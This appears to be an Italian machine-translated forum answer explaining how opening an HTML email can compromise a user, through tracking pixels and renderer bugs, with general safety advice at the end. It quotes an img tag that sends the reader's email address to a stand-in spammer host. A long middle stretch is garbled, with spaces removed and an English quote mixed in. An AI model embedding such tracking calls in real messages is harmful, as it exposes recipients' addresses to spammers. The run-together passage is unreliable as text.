es. link
Supponendo che l'utente non faccia clic su nessun link e non apra alcun allegato nell'e-mail o in alcun elemento di questo tipo - lo apre semplicemente.
Ti darò un esempio davvero semplice. Un trucco di spammer comune molto prima che i client venissero aggiornati per contrastare questo era quello di incorporare una GIF quadrata di 1px in una email HTML. Riceverai un messaggio del tipo:
<img src="http://nastyevilspammer.invalid/[email protected]"/>
Inutiledirechepic.gif
èineffettiunoscriptcgicheaccettaunparametroget.Ilrisultatoèsimileaquesto:
nastyevilspammer.invalid
vienerichiestoperquell'indirizzo,inclusal'emailnelparametroget.Questotruccoèstatoutilizzatoperconfermaregliindirizzie-mailcomeobiettividispamattivi,perspostarlisuelenchidiindirizziattivi,cheglispammervendonopoi.
Ilproblema,elasoluzione,sitrovanelpassaggio2-automaticamentechesifidadelcontenutoinentrata.
Ibugnelclientdipostaelettronicacherichiedonosololaletturadell'emailrichiedonounerrorenellettoreclientchepuòessereutilizzatoperattivarel'exploit.Adesempio,unmotoredirenderingHTMLpotrebbecaricareilflashplayer.Èimprobabile,mapotrebberoessercidegliexploitnelcodicedielaborazionedellestringhedelclient.Ecosìvia.
QuestovaleanchepericlientWeb,chefornirannoHTMLalbrowserperilrendering,aprendocosìtuttelevulnerabilitàdelbrowsercollegate.Nonavevointenzionedileggerel'articolo,maoraho:
Thenewgenerationofe-mail-bornemalwareconsistsofHTMLe-mailswhichautomaticallydownloadsmalwarewhenthee-mailisopened.'
L'articoloèunpo'dilucesuidettagli,mamipiacerebbeprenderetempoperfornireunconsigliopiùcalmo:
Puoi fare molto per migliorare le tue possibilità di evitare il malware eseguendo il solito: attiva Aggiornamenti di Windows. Installa firewall / antivirus. Fai attenzione a quali siti visiti. Aggiungi estensioni orientate alla sicurezza al tuo browser ( NotScripts , noscript ecc.). Usa il browser e il sistema operativo più recenti che puoi. Ecc.
e infine:
Potrebbe sembrare che l'e-mail provenga dai tuoi contatti / amici, ma non hai modo di verificarlo - fai attenzione. La tua banca / società di costruzione non ha bisogno che tu verifichi i tuoi dati di contatto via Internet - se hanno un problema che probabilmente ti scriverebbero e se non sei sicuro, vai nella tua filiale. Un uomo ricco in Nigeria ha non ti ha lasciato una grande eredità, quelle pillole blu non funzionano e qualsiasi altra cosa che sembra troppo bella per essere vera probabilmente lo è.
In questo caso l'email deve sfruttare un bug nel tuo client di posta elettronica. È relativamente difficile per le e-mail di testo semplice, ma più semplice per le e-mail html. I parser e i renderer Html sono complessi e spesso contengono bug che consentono l'esecuzione di codice (ad esempio un buffer overflow). La visualizzazione di un'e-mail maligna è piuttosto simile alla visualizzazione di un sito Web malvagio dal punto di vista della sicurezza.